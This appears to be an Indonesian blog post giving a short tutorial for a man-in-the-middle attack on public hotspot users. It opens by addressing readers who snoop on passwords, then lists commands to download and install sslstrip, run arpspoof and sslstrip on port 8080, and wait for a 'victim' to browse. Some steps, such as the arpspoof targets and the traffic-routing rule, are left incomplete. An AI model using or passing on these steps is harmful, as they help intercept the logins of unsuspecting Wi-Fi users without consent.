Apakah anda sering melakukan sniffing atau ngintip-ngintip password yang berseliweran di hotspot tempat anda Online..ehhehhe disini saya akan memberikan salah satu trik MITM (Man In The Middle Attack); Tapi sebelumnya kita install toolsnya (SSLSTRIP):
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
tar zxvf sslstrip-0.9.tar.gz
preman@bt:~/sslstrip-0.9# python setup.py install
Jalankan Ssltripnya:
sslstrip
=====================================================================
TREAD LANJUTANNYA:
Di BACKTRACK 5 R3 kita sslstrip sudah terinstall di :
BACKTRACK==>EXPLOITATION TOOLS==>WEB EXPLOITATION TOOLS==>SSLSTRIP
OR
cd /pentest/web/sslstrip
Mengconfigurasi mesin penyerang untuk ip forwarding
netstat -nr = Untuk mengetahui gateway ip address kita
Meroute semua http ke sslstrip ke port 8080
Jalankan ARPSPOOF
arpspoof -i -t
Jalankna sslstripnya:
./sslstrip.py -l 8080
disini kita tunggu si victim untuk mengakses internet yang sudah kita route http-nya
maaf saya gak punya sample: gak install OS lain karena low memory.
Source :Gilakomputer.net
0 komentar:
Posting Komentar